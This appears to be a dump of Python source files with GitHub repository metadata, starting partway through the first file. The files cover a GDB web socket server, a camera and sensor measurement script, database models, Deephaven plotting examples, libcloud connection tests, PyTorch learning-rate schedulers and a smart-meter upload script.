await sio.emit('regs', regs, room=sid)
@sio.on('mem')
async def getmem(sid, msg):
addr = msg['addr']
count = msg['count']
data = gdb_sessions[sid].read_mem(addr, count)
await sio.emit('mem', {'addr': addr, 'data': data}, room=sid)
async def getmaps(sid):
maps = gdb_sessions[sid].maps()
await sio.emit('maps', maps, room=sid)
@sio.on('break')
async def setbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].set_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('unbreak')
async def rmbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].remove_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('search')
async def search(sid, data):
q = data['q']
qtype = data['type']
await sio.emit('search_result', gdb_sessions[sid].search(q.encode(), qtype), room=sid)
async def getasm(sid, data):
addr = data['addr']
count = data['count']
result = []
for _ in range(count):
data = gdb_sessions[sid].read_mem(addr, MAX_INSN_LEN)
try:
disasm = next(capstone_md.disasm_lite(data, addr))
except StopIteration:
break
result.append(disasm)
addr += disasm[1]
await sio.emit('asm', result, room=sid)
if __name__ == '__main__':
web.run_app(app)
| 27.960227 | 104 | 0.710018 |
b930187de467bdc99d38231d4b217f6589a62613 | 2,039 | py | Python | starteMessung.py | jkerpe/TroubleBubble | 813ad797398b9f338f136bcb96c6c92186d92ebf | [
"MIT"
] | null | null | null | starteMessung.py | jkerpe/TroubleBubble | 813ad797398b9f338f136bcb96c6c92186d92ebf | [
"MIT"
] | null | null | null | starteMessung.py | jkerpe/TroubleBubble | 813ad797398b9f338f136bcb96c6c92186d92ebf | [
"MIT"
] | 1 | 2021-08-09T14:57:57.000Z | 2021-08-09T14:57:57.000Z | from datetime import datetime
from pypylon import pylon
import nimmAuf
import smbus2
import os
import argparse
import bestimmeVolumen
from threading import Thread
import time
programmstart = time.time()
# Argumente parsen (bei Aufruf im Terminal z.B. 'starteMessung.py -n 100' eingeben)
ap = argparse.ArgumentParser(description="""Skript zum Aufnehmen von Bildern der Teststrecke und der
Volumenbestimmung von Luftblasen""")
ap.add_argument("-n", "--number", default=400, type=int, help="Anzahl an Frames die aufgenommen werden sollen. Default: 400 Bilder")
ap.add_argument("-fr", "--framerate", default=100, type=int, help="Framerate in fps. Richtwerte: <Flow 3 ml/s:50 fps, 3-6ml/s:100 fps, >6ml/s:200 fps; Default: 100 fps")
args = vars(ap.parse_args())
# Argumente des Parsers extrahieren
numberOfImagesToGrab = args['number']
framerate = args['framerate']
if __name__ == '__main__':
startzeit = time.time()
#Test ob Kamera angeschlossen ist
devices = pylon.TlFactory.GetInstance().EnumerateDevices()
if len(devices) == 0:
print("Keine Kamera angeschlossen oder Kamera woanders geöffnet.")
return False
# Test ob Drucksensor angeschlossen ist
try:
bus = smbus2.SMBus(0)
bus.read_i2c_block_data(0x40, 0, 2) # 2 Bytes empfangen
except OSError:
print("Kein Drucksensor angeschlossen")
exit()
# Aus der aktuellen Zeit und den Parametern einen individuellen Ordnernamen generieren
dirname = f'{datetime.now().strftime("%Y-%m-%d-%H-%M-%S")}'
os.mkdir(dirname) # Ordner erstellen
print(f"Ordnername: {dirname}")
beginn = time.time()-programmstart
# Threads zum Aufnehmen und Verarbeiten starten
t_aufnahme = Thread(target=nimmAuf.starte, args=(dirname, numberOfImagesToGrab, framerate, startzeit))
t_tracke = Thread(target=bestimmeVolumen.tracke, args=(dirname, numberOfImagesToGrab))
t_aufnahme.start()
t_tracke.start()
t_aufnahme.join()
t_tracke.join()
| 34.559322 | 169 | 0.703776 |
b978fbbcd4002601ca1e2723cae4385002e671d8 | 2,063 | py | Python | src/onegov/translator_directory/models/language.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/translator_directory/models/language.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/translator_directory/models/language.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | from uuid import uuid4
from sqlalchemy import Index, Column, Text, Table, ForeignKey
from sqlalchemy.orm import object_session
from onegov.core.orm import Base
from onegov.core.orm.types import UUID
spoken_association_table = Table(
'spoken_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
written_association_table = Table(
'written_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
mother_tongue_association_table = Table(
'mother_tongue_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
class Language(Base):
__tablename__ = 'languages'
__table_args__ = (
Index('unique_name', 'name', unique=True),
)
id = Column(UUID, primary_key=True, default=uuid4)
name = Column(Text, nullable=False)
@property
def speakers_count(self):
session = object_session(self)
return session.query(
spoken_association_table).filter_by(lang_id=self.id).count()
@property
def writers_count(self):
session = object_session(self)
return session.query(
written_association_table).filter_by(lang_id=self.id).count()
@property
def native_speakers_count(self):
"""Having it as mother tongue..."""
session = object_session(self)
return session.query(
mother_tongue_association_table).filter_by(lang_id=self.id).count()
@property
def deletable(self):
return (
self.speakers_count
+ self.writers_count
+ self.native_speakers_count
) == 0
| 25.469136 | 79 | 0.650994 |
b9b2dd8fc97fddaaa64ec64957043ee8e8088e39 | 615 | py | Python | frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.model.document import Document
from frappe.contacts.address_and_contact import load_address_and_contact
class Member(Document):
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self)
def validate(self):
self.validate_email_type(self.email)
def validate_email_type(self, email):
from frappe.utils import validate_email_add
validate_email_add(email.strip(), True) | 29.285714 | 72 | 0.786992 |
0ec1afd2facbda8f3febe8ca1dc7c71fb6558f04 | 1,993 | py | Python | packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | [
"MIT"
] | null | null | null | packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | [
"MIT"
] | null | null | null | packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | [
"MIT"
] | null | null | null | from typing import Optional
from watchmen_auth import PrincipalService
from watchmen_data_kernel.cache import CacheService
from watchmen_data_kernel.common import DataKernelException
from watchmen_data_kernel.external_writer import find_external_writer_create, register_external_writer_creator
from watchmen_meta.common import ask_meta_storage, ask_snowflake_generator
from watchmen_meta.system import ExternalWriterService as ExternalWriterStorageService
from watchmen_model.common import ExternalWriterId
from watchmen_model.system import ExternalWriter
def register_external_writer(external_writer: ExternalWriter) -> None:
create = find_external_writer_create(external_writer.type)
if create is None:
raise DataKernelException(f'Creator not found for external writer[{external_writer.dict()}].')
register_external_writer_creator(external_writer.writerCode, create())
class ExternalWriterService:
def __init__(self, principal_service: PrincipalService):
self.principalService = principal_service
def find_by_id(self, writer_id: ExternalWriterId) -> Optional[ExternalWriter]:
external_writer = CacheService.external_writer().get(writer_id)
if external_writer is not None:
if external_writer.tenantId != self.principalService.get_tenant_id():
raise DataKernelException(
f'External writer[id={writer_id}] not belongs to '
f'current tenant[id={self.principalService.get_tenant_id()}].')
register_external_writer(external_writer)
return external_writer
storage_service = ExternalWriterStorageService(
ask_meta_storage(), ask_snowflake_generator(), self.principalService)
storage_service.begin_transaction()
try:
# noinspection PyTypeChecker
external_writer: ExternalWriter = storage_service.find_by_id(writer_id)
if external_writer is None:
return None
CacheService.external_writer().put(external_writer)
register_external_writer(external_writer)
return external_writer
finally:
storage_service.close_transaction()
| 41.520833 | 110 | 0.831912 |
16abab9c314c051765ffd991fb6c764e6cf24cb5 | 235 | py | Python | solutions/pic_search/webserver/src/service/theardpool.py | naetimus/bootcamp | 0182992df7c54012944b51fe9b70532ab6a0059b | [
"Apache-2.0"
] | 1 | 2020-03-10T07:43:08.000Z | 2020-03-10T07:43:08.000Z | solutions/pic_search/webserver/src/service/theardpool.py | naetimus/bootcamp | 0182992df7c54012944b51fe9b70532ab6a0059b | [
"Apache-2.0"
] | null | null | null | solutions/pic_search/webserver/src/service/theardpool.py | naetimus/bootcamp | 0182992df7c54012944b51fe9b70532ab6a0059b | [
"Apache-2.0"
] | 1 | 2020-04-03T05:24:47.000Z | 2020-04-03T05:24:47.000Z | import threading
from concurrent.futures import ThreadPoolExecutor
from service.train import do_train
def thread_runner(thread_num, func, *args):
executor = ThreadPoolExecutor(thread_num)
f = executor.submit(do_train, *args)
| 26.111111 | 49 | 0.795745 |
4c0f174360fe29201e22d16e102aa2c61bad20f2 | 262 | py | Python | production/pygsl-0.9.5/testing/__init__.py | juhnowski/FishingRod | 457e7afb5cab424296dff95e1acf10ebf70d32a9 | [
"MIT"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | production/pygsl-0.9.5/testing/__init__.py | juhnowski/FishingRod | 457e7afb5cab424296dff95e1acf10ebf70d32a9 | [
"MIT"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/testing/__init__.py | poojavade/Genomics_Docker | 829b5094bba18bbe03ae97daf925fee40a8476e8 | [
"Apache-2.0"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | """
Here you find either new implemented modules or alternate implementations
of already modules. This directory is intended to have a second implementation
beside the main implementation to have a discussion which implementation to
favor on the long run.
"""
| 37.428571 | 78 | 0.80916 |
5de70a07393091d4b0d1b81bb83f4335c31b6482 | 3,329 | py | Python | Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | [
"MIT"
] | null | null | null | Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | [
"MIT"
] | 1 | 2022-03-03T21:24:40.000Z | 2022-03-03T21:24:54.000Z | Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | [
"MIT"
] | null | null | null | import deephaven.TableTools as tt
import deephaven.Plot as plt
t = tt.emptyTable(50)\
.update("X = i + 5", "XLow = X -1", "XHigh = X + 1", "Y = Math.random() * 5", "YLow = Y - 1", "YHigh = Y + 1", "USym = i % 2 == 0 ? `AAPL` : `MSFT`")
p = plt.plot("S1", t, "X", "Y").lineColor("black").show()
p2 = plt.plot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
p3 = plt.plot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
p4 = plt.plot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
p4 = plt.plot3d("S1", t, "X", "X", "Y").show()
pBy = plt.plotBy("S1", t, "X", "Y", "USym").show()
pBy = plt.plot3dBy("S1", t, "X", "X", "Y", "USym").show()
cp = plt.catPlot("S1", t, "X", "Y").lineColor("black").show()
cp2 = plt.catPlot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
cp3 = plt.catPlot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
cp4 = plt.catPlot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
cp = plt.catPlot3d("S1", t, "X", "X", "Y").show()
cpBy = plt.catPlotBy("S1", t, "X", "Y", "USym").show()
cpBy = plt.catPlot3dBy("S1", t, "X", "X", "Y", "USym").show()
pp = plt.piePlot("S1", t, "X", "Y")
chp = plt.catHistPlot("S1", t, "X").show()
hp = plt.histPlot("S1", t, "X", 5).show()
hp = plt.histPlot("S1", t, "X", 0, 10, 5).show()
ep = plt.errorBarXY("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh").show()
epBy = plt.errorBarXYBy("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh", "USym").show()
ep2 = plt.errorBarX("S1", t, "X", "XLow", "XHigh", "Y").show()
epBy2 = plt.errorBarXBy("S1", t, "X", "XLow", "XHigh", "Y", "USym").show()
ep3 = plt.errorBarY("S1", t, "X", "Y", "YLow", "YHigh").show()
epBy3 = plt.errorBarYBy("S1", t, "X", "Y", "YLow", "YHigh", "USym").show()
doubles = [3, 4, 3, 5, 4, 5]
time = 1491946585000000000
t = tt.newTable(tt.col("USym", ["A", "B", "A", "B", "A", "B"]),
tt.doubleCol("Open", doubles), tt.doubleCol("High", doubles),
tt.doubleCol("Low", doubles), tt.doubleCol("Close", doubles))
t = t.updateView("Time = new DBDateTime(time + (MINUTE * i))")
ohlc = plt.ohlcPlot("Test1", t, "Time", "Open", "High", "Low", "Close")
ohlcPlotBy = plt.figure().newChart(0)\
.chartTitle("Chart Title")\
.newAxes()\
.xLabel("X")\
.yLabel("Y")\
.ohlcPlotBy("Test1", t, "Time", "Open", "High", "Low", "Close", "USym")
categories = ["Samsung", "Others", "Nokia", "Apple", "MSFT"]
valuesD = [27.8, 55.3, 16.8, 17.1, 23.1]
valuesI = [27, 55, 16, 17, 15]
ap = plt.plot("S1", valuesD, valuesI).show()
ap = plt.plot3d("S1", valuesI, valuesI, valuesI).show()
acp = plt.catPlot("S1", categories, valuesI).show()
acp2 = plt.catPlot3d("S1", categories, categories, valuesD).show()
achp = plt.catHistPlot("S1", categories).show()
app = plt.figure().xLabel("X").yLabel("Y").piePlot("S1", categories, valuesI).pointLabelFormat("{0}").show()
aep = plt.errorBarXY("S1", valuesD, valuesD, valuesD, valuesD, valuesD, valuesD).show()
aep2 = plt.errorBarX("S1", valuesD, valuesD, valuesD, valuesD).show()
aep3 = plt.errorBarY("S1", valuesD, valuesD, valuesD, valuesD).show()
hp = plt.histPlot("S1", valuesD, 5).show()
hp = plt.histPlot("S1", valuesD, 0, 10, 5).show()
hp = plt.histPlot("S1", valuesI, 5).show()
| 37.829545 | 153 | 0.578252 |
5df79191a02e9cdc36eab83fa9b24e2f2d9fe213 | 7,695 | py | Python | Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/apache_libcloud-0.15.1-py2.7.egg/libcloud/test/test_connection.py | poojavade/Genomics_Docker | 829b5094bba18bbe03ae97daf925fee40a8476e8 | [
"Apache-2.0"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | libcloud/test/test_connection.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | libcloud/test/test_connection.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more§
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import ssl
from mock import Mock, call
from libcloud.test import unittest
from libcloud.common.base import Connection
from libcloud.common.base import LoggingConnection
class ConnectionClassTestCase(unittest.TestCase):
def setUp(self):
self.originalConnect = Connection.connect
self.originalResponseCls = Connection.responseCls
Connection.connect = Mock()
Connection.responseCls = Mock()
Connection.allow_insecure = True
def tearDown(self):
Connection.connect = self.originalConnect
Connection.responseCls = Connection.responseCls
Connection.allow_insecure = True
def test_dont_allow_insecure(self):
Connection.allow_insecure = True
Connection(secure=False)
Connection.allow_insecure = False
expected_msg = (r'Non https connections are not allowed \(use '
'secure=True\)')
self.assertRaisesRegexp(ValueError, expected_msg, Connection,
secure=False)
def test_content_length(self):
con = Connection()
con.connection = Mock()
# GET method
# No data, no content length should be present
con.request('/test', method='GET', data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# '' as data, no content length should be present
con.request('/test', method='GET', data='')
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# 'a' as data, content length should be present (data in GET is not
# correct, but anyways)
con.request('/test', method='GET', data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
# POST, PUT method
# No data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# '' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# No data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# '' as data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# 'a' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
def test_cache_busting(self):
params1 = {'foo1': 'bar1', 'foo2': 'bar2'}
params2 = [('foo1', 'bar1'), ('foo2', 'bar2')]
con = Connection()
con.connection = Mock()
con.pre_connect_hook = Mock()
con.pre_connect_hook.return_value = {}, {}
con.cache_busting = False
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params1)
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params2)
con.cache_busting = True
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0])
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0][len(params2)])
def test_context_is_reset_after_request_has_finished(self):
context = {'foo': 'bar'}
def responseCls(connection, response):
connection.called = True
self.assertEqual(connection.context, context)
con = Connection()
con.called = False
con.connection = Mock()
con.responseCls = responseCls
con.set_context(context)
self.assertEqual(con.context, context)
con.request('/')
# Context should have been reset
self.assertTrue(con.called)
self.assertEqual(con.context, {})
# Context should also be reset if a method inside request throws
con = Connection()
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.connection.request = Mock(side_effect=ssl.SSLError())
try:
con.request('/')
except ssl.SSLError:
pass
self.assertEqual(con.context, {})
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.responseCls = Mock(side_effect=ValueError())
try:
con.request('/')
except ValueError:
pass
self.assertEqual(con.context, {})
def test_log_curl(self):
url = '/test/path'
body = None
headers = {}
con = LoggingConnection()
con.protocol = 'http'
con.host = 'example.com'
con.port = 80
for method in ['GET', 'POST', 'PUT', 'DELETE']:
cmd = con._log_curl(method=method, url=url, body=body,
headers=headers)
self.assertEqual(cmd, 'curl -i -X %s --compress http://example.com:80/test/path' %
(method))
# Should use --head for head requests
cmd = con._log_curl(method='HEAD', url=url, body=body, headers=headers)
self.assertEqual(cmd, 'curl -i --head --compress http://example.com:80/test/path')
if __name__ == '__main__':
sys.exit(unittest.main())
| 36.995192 | 94 | 0.624172 |
f8d46f993d25bd7f9f34660f23bf18928f5a3963 | 5,672 | py | Python | module/classification_package/src/utils.py | fishial/Object-Detection-Model | 4792f65ea785156a8e240d9cdbbc0c9d013ea0bb | [
"CC0-1.0"
] | 1 | 2022-01-03T14:00:17.000Z | 2022-01-03T14:00:17.000Z | module/classification_package/src/utils.py | fishial/Object-Detection-Model | 4792f65ea785156a8e240d9cdbbc0c9d013ea0bb | [
"CC0-1.0"
] | null | null | null | module/classification_package/src/utils.py | fishial/Object-Detection-Model | 4792f65ea785156a8e240d9cdbbc0c9d013ea0bb | [
"CC0-1.0"
] | 1 | 2021-12-21T09:50:53.000Z | 2021-12-21T09:50:53.000Z | import numpy as np
import logging
import numbers
import torch
import math
import json
import sys
from torch.optim.lr_scheduler import LambdaLR
from torchvision.transforms.functional import pad
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class ConstantLRSchedule(LambdaLR):
""" Constant learning rate schedule.
"""
def __init__(self, optimizer, last_epoch=-1):
super(ConstantLRSchedule, self).__init__(optimizer, lambda _: 1.0, last_epoch=last_epoch)
class WarmupConstantSchedule(LambdaLR):
""" Linear warmup and then constant.
Linearly increases learning rate schedule from 0 to 1 over `warmup_steps` training steps.
Keeps learning rate schedule equal to 1. after warmup_steps.
"""
def __init__(self, optimizer, warmup_steps, last_epoch=-1):
self.warmup_steps = warmup_steps
super(WarmupConstantSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
return 1.
class WarmupLinearSchedule(LambdaLR):
""" Linear warmup and then linear decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Linearly decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps.
"""
def __init__(self, optimizer, warmup_steps, t_total, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
super(WarmupLinearSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1, self.warmup_steps))
return max(0.0, float(self.t_total - step) / float(max(1.0, self.t_total - self.warmup_steps)))
class WarmupCosineSchedule(LambdaLR):
""" Linear warmup and then cosine decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps following a cosine curve.
If `cycles` (default=0.5) is different from default, learning rate follows cosine function after warmup.
"""
def __init__(self, optimizer, warmup_steps, t_total, cycles=.5, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
self.cycles = cycles
super(WarmupCosineSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
# progress after warmup
progress = float(step - self.warmup_steps) / float(max(1, self.t_total - self.warmup_steps))
return max(0.0, 0.5 * (1. + math.cos(math.pi * float(self.cycles) * 2.0 * progress)))
def get_padding(image):
w, h = image.size
max_wh = np.max([w, h])
h_padding = (max_wh - w) / 2
v_padding = (max_wh - h) / 2
l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5
t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5
r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5
b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5
padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad))
return padding
class NewPad(object):
def __init__(self, fill=0, padding_mode='constant'):
assert isinstance(fill, (numbers.Number, str, tuple))
assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']
self.fill = fill
self.padding_mode = padding_mode
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be padded.
Returns:
PIL Image: Padded image.
"""
return pad(img, get_padding(img), self.fill, self.padding_mode)
def __repr__(self):
return self.__class__.__name__ + '(padding={0}, fill={1}, padding_mode={2})'. \
format(self.fill, self.padding_mode)
def find_device():
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
return device
def read_json(data):
with open(data) as f:
return json.load(f)
def save_json(data, path):
with open(path, 'w', encoding='utf-8') as f:
json.dump(data, f)
def setup_logger():
logger = logging.getLogger('train')
logger.setLevel(logging.INFO)
if len(logger.handlers) == 0:
formatter = logging.Formatter('%(asctime)s | %(message)s')
ch = logging.StreamHandler(stream=sys.stdout)
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
def adjust_learning_rate(optimizer, epoch, lr):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def save_checkpoint(model, path):
torch.save(model.state_dict(), path)
def reverse_norm_image(image):
MEAN = torch.tensor([0.485, 0.456, 0.406])
STD = torch.tensor([0.229, 0.224, 0.225])
reverse_image = image * STD[:, None, None] + MEAN[:, None, None]
return reverse_image.permute(1, 2, 0).cpu().numpy() | 33.761905 | 117 | 0.653738 |
5d1d5be9e9e0382909fb3777ed89becc272c0e93 | 767 | py | Python | Kapitel_1/_1_public_private.py | Geralonx/Classes_Tutorial | 9499db8159efce1e3c38975b66a9c649631c6727 | [
"MIT"
] | 1 | 2020-12-24T15:42:54.000Z | 2020-12-24T15:42:54.000Z | Kapitel_1/_1_public_private.py | Geralonx/Classes_Tutorial | 9499db8159efce1e3c38975b66a9c649631c6727 | [
"MIT"
] | null | null | null | Kapitel_1/_1_public_private.py | Geralonx/Classes_Tutorial | 9499db8159efce1e3c38975b66a9c649631c6727 | [
"MIT"
] | null | null | null | # --- Klassendeklaration mit Konstruktor --- #
class PC:
def __init__(self, cpu, gpu, ram):
self.cpu = cpu
self.gpu = gpu
self.__ram = ram
# --- Instanziierung einer Klasse ---#
# --- Ich bevorzuge die Initialisierung mit den Keywords --- #
pc_instanz = PC(cpu='Ryzen 7', gpu='RTX2070Super', ram='GSkill')
# --- Zugriff auf normale _public_ Attribute --- #
print(pc_instanz.cpu)
print(pc_instanz.gpu)
# --- Zugriff auf ein _privates_ Attribut --- #
# Auskommentiert, da es einen AttributeError schmeißt.
# print(pc_instanz.__ram)
# --- Zugriff auf das Instanz-Dictionary, um die Inhalte jener Instanz zu erhalten. --- #
print(pc_instanz.__dict__)
# --- Zugriff auf das eigentlich _private_ Attribut. --- #
print(pc_instanz._PC__ram)
| 29.5 | 89 | 0.684485 |
5d66ef032fbd2dcf091b5ffde482a5d596613146 | 1,940 | py | Python | bin/write2cly.py | docdiesel/smartmetertools | 3b7449c7a9069696af078631aa5440f53d0f57bc | [
"MIT"
] | 1 | 2019-05-30T08:28:31.000Z | 2019-05-30T08:28:31.000Z | bin/write2cly.py | docdiesel/smartmetertools | 3b7449c7a9069696af078631aa5440f53d0f57bc | [
"MIT"
] | null | null | null | bin/write2cly.py | docdiesel/smartmetertools | 3b7449c7a9069696af078631aa5440f53d0f57bc | [
"MIT"
] | null | null | null | #!/usr/bin/python3
## write2cly.py - reads json (generated by sml_reader.py) from stdin
## - writes values to Corlysis time series InfluxDB
##
## Writes data from smart meter to time series database (InfluxDB)
## at Corlysis.com [1]. You need to configure your database and token
## in the config section.
##
## [1] https://corlysis.com/
##==== license section ========
## This code is under MIT License: Copyright (C) 2019 Bernd Künnen
## License details see https://choosealicense.com/licenses/mit/
##==== config section ========
# define corlysis settings here - set db and token at least
cly_base_url = 'https://corlysis.com:8086/write'
cly_parameters = {
"db": "energy",
"u" : "token",
"p" : "placeyourtokenhere",
"precision": "ms"}
# assign readable field names
config = {
"1.8.0": "Bezug",
"2.8.0": "Einspeisung",
"16.7.0": "Wirkleistung"
}
##==== code section ==== no need to change lines below ====
##-- import libraries
import json, sys, requests
import requests
import time
# load json from stdin
try:
myjson = json.load(sys.stdin)
except:
sys.stderr.write('!! error loading json')
exit(1)
# decode json
try:
line = "meter_data "
# add each meter value to line
for obis in myjson['data']:
key = config[obis] # set human readable field name
value = myjson['data'][obis] # get value from smart meter
line += key + '=' + str(value) + ',' # add key=value to insert line
# cut off last comma
line = line[:-1]
# add timestamp as unix timestamp in ms
line += ' ' + str(int(time.time()*1000)) #+ '\n'
# post data into time series database; http response should be 204
r = requests.post(cly_base_url, params=cly_parameters, data=line)
if r.status_code != 204 :
sys.stderr.write(r.status_code)
sys.stderr.write(r.content)
